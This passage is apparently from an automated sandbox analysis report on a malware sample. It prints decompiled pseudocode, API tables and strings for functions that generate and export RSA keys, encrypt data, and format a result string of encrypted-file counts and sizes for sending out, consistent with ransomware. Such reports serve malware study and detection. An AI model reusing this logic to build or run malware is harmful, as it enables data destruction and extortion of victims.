				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0xd80128]");
				_v28 = _t79;
				_t80 =  *0xd80134; // 0x6a73
				_v24 = _t80;
				_t81 =  *0xd80136; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E00D78B30( &_v435, 0, 0xff);
				E00D75C40( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E00D75CF0( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E00D75370(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E00D77720( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x00d75540
0x00d7555a
0x00d7555c
0x00d7555f
0x00d75565
0x00d7556a
0x00d75576
0x00d75578
0x00d7556c
0x00d7556c
0x00d7556c
0x00d75572
0x00d75572
0x00d7557a
0x00d7557e
0x00d7558d
0x00d75596
0x00d75598
0x00d75599
0x00d7559e
0x00d755a0
0x00d755a1
0x00d755a3
0x00d755a4
0x00d755a6
0x00d755a7
0x00d755a9
0x00d755aa
0x00d755af
0x00d755b1
0x00d755b2
0x00d755ba
0x00d755c5
0x00d755d0
0x00d755e8
0x00d755ee
0x00d755f0
0x00d755f6
0x00d755f8
0x00d75606
0x00d75609
0x00d75615
0x00d75619
0x00d75622
0x00d75627
0x00d7562a
0x00d75631
0x00d7564d
0x00d75655
0x00d75662
0x00d75671
0x00d7568a
0x00d7568c
0x00d7568c
0x00d756a2
0x00d756a2
0x00d756af
0x00d756b2
0x00d756b4
0x00d756b7
0x00d756bc
0x00d756c5
0x00d756c5
0x00d756be
0x00d756be
0x00d756c3
0x00000000
0x00000000
0x00d756c3
0x00d756cd
0x00d756d3
0x00d756d5
0x00d756d8
0x00d756d8
0x00d756dd
0x00d756e3
0x00d756e5
0x00d756e5
0x00d756e7
0x00d756ee
0x00d756d8
0x00d756f9
0x00d75713
0x00d75720
0x00d75728
0x00d75737
0x00d7573b
0x00d75741

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 00D7555F
wsprintfW.USER32 ref: 00D7558D
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 00D755DC
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 00D755EE
_memset.LIBCMT ref: 00D75631
lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 00D7563D
CryptBinaryToStringA.CRYPT32(?,746569A0,40000001,00000000,00000000), ref: 00D75682
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 00D7568C
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00D75699
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 00D756A8
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00D756B2
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00D756CF
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00D756E8
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00D75720
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00D75737

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 00D75587
#shasj, xrefs: 00D755F0

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
API String ID: 2994799111-4131875188
Opcode ID: 0c144d9554ed5b258d098eba710a3338048523e11d99eca133b129d5c5373f70
Instruction ID: bab2da7525b01f7dc7597d1bb6b13959fa5c5c7785c9bc195027e1f7f5286f6d
Opcode Fuzzy Hash: 0c144d9554ed5b258d098eba710a3338048523e11d99eca133b129d5c5373f70
Instruction Fuzzy Hash: 6751A571900319ABEB119B64DC56FEFBB79EF44700F544064E909A7290FBB06A44CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D77C60 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00D77C60(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						goto L15;
					}
				}
			}

0x00d77c70
0x00d77c72
0x00d77c77
0x00d77c7a
0x00d77c7d
0x00d77c85
0x00d77d79
0x00d77d81
0x00d77c8b
0x00d77c8b
0x00d77c90
0x00d77c90
0x00d77c93
0x00d77c98
0x00d77c99
0x00d77ca5
0x00d77ca5
0x00d77cb1
0x00d77cb5
0x00d77d87
0x00d77d95
0x00d77da3
0x00d77cc3
0x00d77cc6
0x00d77cce
0x00d77cd5
0x00d77cdc
0x00d77ce2
0x00d77ce6
0x00d77ced
0x00d77cf4
0x00d77cfb
0x00d77cff
0x00d77d07
0x00d77d17
0x00d77d17
0x00d77d1c
0x00d77d24
0x00000000
0x00d77d26
0x00d77d26
0x00d77d27
0x00d77d28
0x00d77d2f
0x00000000
0x00d77d31
0x00d77d31
0x00d77d35
0x00d77d37
0x00d77d3a
0x00d77d41
0x00d77d45
0x00d77d4e
0x00d77d52
0x00d77d53
0x00d77d41
0x00d77d57
0x00d77d57
0x00d77d2f
0x00d77d09
0x00d77d09
0x00d77d0d
0x00d77d15
0x00d77d5e
0x00d77d5e
0x00000000
0x00000000
0x00000000
0x00d77d15
0x00d77d65
0x00d77d73
0x00000000
0x00d77d73
0x00d77cb5

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00D77C7D
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00D77CAB
GetModuleHandleA.KERNEL32(?), ref: 00D77CFF
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00D77D0D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00D77D1C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D77D65
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D77D73
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D77D87
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D77D95

Strings

CryptGenRandomAdvapi32.dll, xrefs: 00D77D17, 00D77D1A
Advapi32.dll, xrefs: 00D77D09, 00D77D0C

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 02dba09f1ebe2655dfa9fc66dde94eb8eca37f4e1f8726cd1cddbf4920a41cef
Instruction ID: b1988205b03ffb2e6fbf43629065288c1de19f4468c0fc354535874dd8012e94
Opcode Fuzzy Hash: 02dba09f1ebe2655dfa9fc66dde94eb8eca37f4e1f8726cd1cddbf4920a41cef
Instruction Fuzzy Hash: 0D31C771A04309EBDB209FE5DC59BEEBB78EF04700F248469E909E6290F7719A11CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00D77DB0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00D77DB0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

0x00d77dc0
0x00d77dc2
0x00d77dc7
0x00d77dcd
0x00d77dd0
0x00d77dd8
0x00d77ea2
0x00d77eaa
0x00d77dde
0x00d77dde
0x00d77de0
0x00d77de0
0x00d77de3
0x00d77de7
0x00d77de8
0x00d77df4
0x00d77dfe
0x00d77e02
0x00d77eb0
0x00d77ebe
0x00d77ecc
0x00d77e11
0x00d77e14
0x00d77e1c
0x00d77e23
0x00d77e2a
0x00d77e30
0x00d77e34
0x00d77e3b
0x00d77e42
0x00d77e49
0x00d77e4d
0x00d77e55
0x00d77e65
0x00d77e65
0x00d77e6a
0x00d77e72
0x00d77e7d
0x00d77e86
0x00d77e86
0x00d77e57
0x00d77e57
0x00d77e5b
0x00d77e63
0x00000000
0x00000000
0x00d77e63
0x00d77e8e
0x00d77e9c
0x00000000
0x00d77e9c
0x00d77e02

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,746566A0,00000000), ref: 00D77DD0
VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00D77DF8
GetModuleHandleA.KERNEL32(?), ref: 00D77E4D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00D77E5B
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00D77E6A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D77E8E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D77E9C
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00D736A5), ref: 00D77EB0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,00D736A5), ref: 00D77EBE

Strings

CryptGenRandomAdvapi32.dll, xrefs: 00D77E65, 00D77E68
Advapi32.dll, xrefs: 00D77E57, 00D77E5A

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 5eaade7d6794c29e7908272bb1baa6d560d3a597f3770539290678be35a5bc3a
Instruction ID: 20f552fbd12168536db009f0ad96fcb607d6b978a85998e4fbbec910d5473e10
Opcode Fuzzy Hash: 5eaade7d6794c29e7908272bb1baa6d560d3a597f3770539290678be35a5bc3a
Instruction Fuzzy Hash: 87319571A04309AFDF108FA5DC4ABEEBB79EF44701F104069FA09E6290E7709A10CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00D76000 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00D76000(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xd82ae8);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E00D734F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xd82ae8);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x00d7600b
0x00d76011
0x00d76018
0x00d7602a
0x00d7602e
0x00d76036
0x00d7606e
0x00d7606e
0x00d76091
0x00d76093
0x00d7609c
0x00d760aa
0x00d760b0
0x00d760b6
0x00d760c4
0x00d760d2
0x00d760d8
0x00d760e1
0x00d760e8
0x00d760ed
0x00d760ed
0x00d760e8
0x00d760f8
0x00d76103
0x00000000
0x00d76109
0x00d76038
0x00d76043
0x00000000
0x00d76067
0x00d76054
0x00d7605c
0x00000000
0x00d76065
0x00000000

APIs

EnterCriticalSection.KERNEL32(00D82AE8,?,00D73724,00000000,00000000,00000000,?,00000800), ref: 00D7600B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00D73724,00000000,00000000,00000000), ref: 00D7602E
GetLastError.KERNEL32(?,00D73724,00000000,00000000,00000000), ref: 00D76038
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00D73724,00000000,00000000,00000000), ref: 00D76054
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00D73724,00000000,00000000), ref: 00D76089
CryptGetKeyParam.ADVAPI32(00000000,00000008,00D73724,0000000A,00000000,?,00D73724,00000000), ref: 00D760AA
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,00D73724,?,00D73724,00000000), ref: 00D760D2
GetLastError.KERNEL32(?,00D73724,00000000), ref: 00D760DB
CryptReleaseContext.ADVAPI32(00000000,00000000,?,00D73724,00000000,00000000), ref: 00D760F8
LeaveCriticalSection.KERNEL32(00D82AE8,?,00D73724,00000000,00000000), ref: 00D76103

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00D76023, 00D76049

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: 99a7f413f660ab91fb1394461c6a4a84bfbb6d972dd5f4d124a7528861bc0a3f
Instruction ID: 1c455292c4452b6c5ba7390078d414653b26d6be2b1ca6bfea84623c4425e3fc
Opcode Fuzzy Hash: 99a7f413f660ab91fb1394461c6a4a84bfbb6d972dd5f4d124a7528861bc0a3f
Instruction Fuzzy Hash: 7E310175A50309BFDB10DFA0DC5AFAEB7B8AB48701F108448F609E6290E7B59A44DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D75D80 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00D75D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x00d75d91
0x00d75d95
0x00d75d9d
0x00d75dd5
0x00d75de3
0x00d75de7
0x00d75def
0x00d75def
0x00d75df2
0x00d75e0b
0x00d75e23
0x00d75e2d
0x00d75e39
0x00d75e4e
0x00000000
0x00d75e54
0x00d75d9f
0x00d75daa
0x00000000
0x00d75dce
0x00d75dbb
0x00d75dc3
0x00000000
0x00d75dcc
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00D7491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00D74916,?,00D7491E), ref: 00D75D95
GetLastError.KERNEL32(?,00D7491E), ref: 00D75D9F
CryptAcquireContextW.ADVAPI32(00D7491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00D7491E), ref: 00D75DBB
CryptGenKey.ADVAPI32(00D7491E,0000A400,08000001,?,?,00D7491E), ref: 00D75DE7
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 00D75E0B
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 00D75E23
CryptDestroyKey.ADVAPI32(?), ref: 00D75E2D
CryptReleaseContext.ADVAPI32(00D7491E,00000000), ref: 00D75E39
CryptAcquireContextW.ADVAPI32(00D7491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 00D75E4E

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00D75D8A, 00D75DB0, 00D75E43

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: d229c57b66037de0e298e30269cb227e3b877bb7e31f50045285fa0c2a3b1a6e
Instruction ID: 87d31d72b4b8fc9899c7de6ab5f59723a514835ab3139fa8c9e20f1c93816faa
Opcode Fuzzy Hash: d229c57b66037de0e298e30269cb227e3b877bb7e31f50045285fa0c2a3b1a6e
Instruction Fuzzy Hash: C0214F76790304BBEB20DBA0DC5AF9EB779AB48B01F104404F709EA2C4E6F59944DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D72F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00D72F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				WCHAR* _t23;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8);
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
					_t35 = _t18;
					if(_t35 != 0) {
						_push( &_v12);
						_push(_v8);
						_push(_t35);
						if( *_t39() == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000);
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 <= 0) {
								goto L10;
							} else {
								while(1) {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
										break;
									}
									_t40 = _t40 + 1;
									if(_t40 < _t31) {
										continue;
									} else {
										goto L10;
									}
									goto L12;
								}
								VirtualFree(_t35, 0, 0x8000);
								return 1;
							}
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x00d72f5a
0x00d72f69
0x00d72f6d
0x00d72f74
0x00d72f76
0x00d72f7b
0x00d72f8d
0x00d72f93
0x00d72f97
0x00d72fa3
0x00d72fa4
0x00d72fa7
0x00d72fac
0x00d72ff2
0x00d72ffa
0x00d73008
0x00d72fae
0x00d72fb1
0x00d72fb3
0x00d72fb8
0x00000000
0x00d72fc0
0x00d72fc0
0x00d72fc5
0x00d72fcf
0x00d72fd7
0x00000000
0x00000000
0x00d72fed
0x00d72ff0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d72ff0
0x00d73011
0x00d73022
0x00d73022
0x00d72fb8
0x00d72f99
0x00d72f9e
0x00d72f9e
0x00d72f81
0x00d72f81
0x00d72f81
0x00000000

APIs

EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00D72F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00D72F8D

Strings

iet, xrefs: 00D72FE3

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: iet
API String ID: 4140748134-2308090442
Opcode ID: d1a00f0bb4e8dadd7df4e338f5eadb234355a59cb64c396486edc8b253ee023f
Instruction ID: e57f97baa2c5ceee55605a0d6c7028b366f1b16c6f4a6a64804844a8272df367
Opcode Fuzzy Hash: d1a00f0bb4e8dadd7df4e338f5eadb234355a59cb64c396486edc8b253ee023f
Instruction Fuzzy Hash: ED21C532A00319ABEB209F999C85FF9F7BCEB44710F4441A6FE08D6180F77199559BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D768F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D777F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D779D4
Part of subcall function 00D777F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 00D779ED

